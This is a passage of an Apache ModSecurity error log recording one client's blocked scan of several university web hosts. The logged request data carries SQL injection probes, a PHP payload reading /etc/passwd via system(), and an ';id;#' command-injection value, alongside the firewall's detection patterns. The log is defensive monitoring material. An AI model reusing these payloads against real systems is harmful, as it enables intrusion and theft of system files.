"OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQ7NGQAAAAH"]
[Tue Aug 29 11:32:06.380819 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xsCo-f0AAAP5mOEAAAAM"]
[Tue Aug 29 11:32:06.423725 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAQV4S4AAAA3"]
[Tue Aug 29 11:32:06.439326 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10xsCo-f0AAAPiBpoAAAAB"]
[Tue Aug 29 11:32:06.443388 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xsCo-f0AAAQ7NGcAAAAH"]
[Tue Aug 29 11:32:06.456225 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAQR4-gAAAAz"]
[Tue Aug 29 11:32:06.457312 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAP5mOQAAAAM"]
[Tue Aug 29 11:32:06.459947 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAPiBpsAAAAB"]
[Tue Aug 29 11:32:06.483682 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQV4TEAAAA3"]
[Tue Aug 29 11:32:07.307416 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10x8Co-f0AAAP5mOYAAAAM"]
[Tue Aug 29 11:32:07.319571 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10x8Co-f0AAAP8G3wAAAAV"]
[Tue Aug 29 11:32:07.336403 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10x8Co-f0AAAQ7NGsAAAAH"]
[Tue Aug 29 11:32:07.369629 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10x8Co-f0AAAQR4-wAAAAz"]
[Tue Aug 29 11:32:07.377522 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10x8Co-f0AAAQ83P8AAAAI"]
[Tue Aug 29 11:32:07.435950 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10x8Co-f0AAAP5mOgAAAAM"]
[Tue Aug 29 11:32:07.737563 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10x8Co-f0AAAQ7NG0AAAAH"]
[Tue Aug 29 11:32:07.740420 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10x8Co-f0AAAQV4TQAAAA3"]
[Tue Aug 29 11:32:07.797372 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10x8Co-f0AAAP5mOkAAAAM"]
[Tue Aug 29 11:32:08.309905 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10yMCo-f0AAAN9sSYAAAAJ"]
[Tue Aug 29 11:32:08.310038 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10yMCo-f0AAAQV4TUAAAA3"]
[Tue Aug 29 11:32:08.323703 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAPiBqMAAAAB"]
[Tue Aug 29 11:32:08.331040 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10yMCo-f0AAAP@M5EAAAAZ"]
[Tue Aug 29 11:32:08.348647 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQKOecAAAAs"]
[Tue Aug 29 11:32:08.370866 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAP@M5MAAAAZ"]
[Tue Aug 29 11:32:08.389198 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQKOekAAAAs"]
[Tue Aug 29 11:32:08.392157 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAP5mO0AAAAM"]
[Tue Aug 29 11:32:08.411791 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri 